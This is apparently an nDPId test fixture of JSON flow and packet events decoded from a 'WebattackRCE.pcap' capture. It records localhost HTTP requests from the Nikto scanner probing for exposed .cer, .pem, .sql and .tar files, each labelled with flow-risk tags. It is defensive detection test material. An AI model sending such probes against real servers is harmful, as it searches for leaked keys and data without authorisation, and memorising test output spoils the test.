00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1576420276860,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276860,"pkt":"AAAAAAAAAAAAAAAACABFAADALy9AAEAGDQd\/AAABfwAAAcJ8H5ChphcTD1c5UYAYAED+tAAAAQEICp1m+6SdZvukR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1576420276862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276862,"pkt":"AAAAAAAAAAAAAAAACABFAAC9dyVAAEAGxRN\/AAABfwAAAcJ+H5ApDE8dFFMQVIAYAED+sQAAAQEICp1m+6WdZvulR0VUIC8xLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1576420276863,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276863,"pkt":"AAAAAAAAAAAAAAAACABFAAC9pJxAAEAGl5x\/AAABfwAAAcKAH5APfJymg2qZ5YAYAED+sQAAAQEICp1m+6edZvumR0VUIC8xLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1576420276864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276864,"pkt":"AAAAAAAAAAAAAAAACABFAADBqoBAAEAGkbR\/AAABfwAAAcKCH5Cxx5I\/tyTjW4AYAED+tQAAAQEICp1m+6idZvuoR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1576420276865,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276865,"pkt":"AAAAAAAAAAAAAAAACABFAADBsWVAAEAGis9\/AAABfwAAAcKEH5CGGYkkbARgroAYAED+tQAAAQEICp1m+6mdZvupR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1576420276866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276866,"pkt":"AAAAAAAAAAAAAAAACABFAADBsTlAAEAGivt\/AAABfwAAAcKGH5CzxIl4Ool\/aIAYAED+tQAAAQEICp1m+6qdZvuqR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1576420276869,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276869,"pkt":"AAAAAAAAAAAAAAAACABFAADBxdFAAEAGdmN\/AAABfwAAAcKIH5BDzv2PC6KyZoAYAED+tQAAAQEICp1m+6ydZvusR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1576420276870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276870,"pkt":"AAAAAAAAAAAAAAAACABFAADAIL1AAEAGG3l\/AAABfwAAAcKKH5D\/Dxj7MLgvIIAYAED+tAAAAQEICp1m+66dZvuuR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1576420276871,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276871,"pkt":"AAAAAAAAAAAAAAAACABFAADAmdRAAEAGomF\/AAABfwAAAcKMH5DqwaGU3VMvd4AYAED+tAAAAQEICp1m+6+dZvuvR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1576420276872,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276872,"pkt":"AAAAAAAAAAAAAAAACABFAADFFSZAAEAGJwt\/AAABfwAAAcKOH5D96y1nB6jLDIAYAED+uQAAAQEICp1m+7CdZvuwR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1576420276873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276873,"pkt":"AAAAAAAAAAAAAAAACABFAADFhm9AAEAGtcF\/AAABfwAAAcKQH5BNzL4wefiP1IAYAED+uQAAAQEICp1m+7GdZvuxR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
